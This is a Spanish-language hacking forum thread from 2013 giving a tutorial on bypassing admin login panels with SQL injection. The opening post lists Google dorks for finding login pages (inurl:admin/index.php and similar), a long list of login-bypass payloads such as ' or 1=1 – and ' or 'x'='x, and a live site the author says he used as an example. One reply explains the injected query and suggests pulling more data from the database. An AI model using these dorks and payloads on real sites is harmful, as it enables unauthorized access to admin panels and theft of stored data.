[SQL] Bypass Admin Panel

Iniciado por Assed [In]Seguridad Informática, Julio 30, 2013, 11:58:38 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 30, 2013, 11:58:38 PM Ultima modificación: Julio 31, 2013, 12:01:16 AM por Assed [In]Seguridad Informática
Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear  panel (admin)


algunos dorks


Dorks :


inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp


lo aremos con una simple consulta SQL
,,,

Acá una imagen (mía)




algunos tipos de consultas :

' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –


Sitio que use de ejemplo : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno Un saludo Undercode  ;)
Passion informatic.

Te hago una pregunta porque recien me estoy iniciando en este tema. Hacer esto en el adminlogin, de que sirve? Se que ahi estas tirando un true-false (en tu caso un 1 o "todas las verdaderas"). Pero que se obtiene de resultado? para que sirve? Que es lo que se puede conseguir?

Se entiende mi pregunta?
Saludos

wow revivir un post de hace 24 meses

salu2

hermano date una vuelta en el buscador del foro de como funcionan las consultas de SQL que es una inyeccion SQL primero antes de ejecutar "ataques con dorks"  ::)

"Human Stupidity that's why Hackers always win."
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta importante ahora es subir el # de post en un foro wtf 😂
😂 CTRL + p
DORK

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta blood_rec tiene razón, la próxima vez que tengas una duda la puedes postear en el foro "Dudas y pedidos generales".
Y sobre tu duda, esta inyección SQL es por post en el form de logeo y básicamente lo que hace es dar por correcta la sentencia ingresada como clave, ya que uno es igual a uno quedando la consulta asi:

Código: mysql
SELECT * FROM users 
WHERE name='admin'
and password='' or '1'='1'


y dando el OK  te da acceso al panel, esta técnica se conoce como Login Bypass y es muy vieja.

P/D: También se podría prepara una sentencia mejor, inyectarla y hacer que nos devuelva algunos datos de  la DB más interesantes que un simple bypass.

Saludos!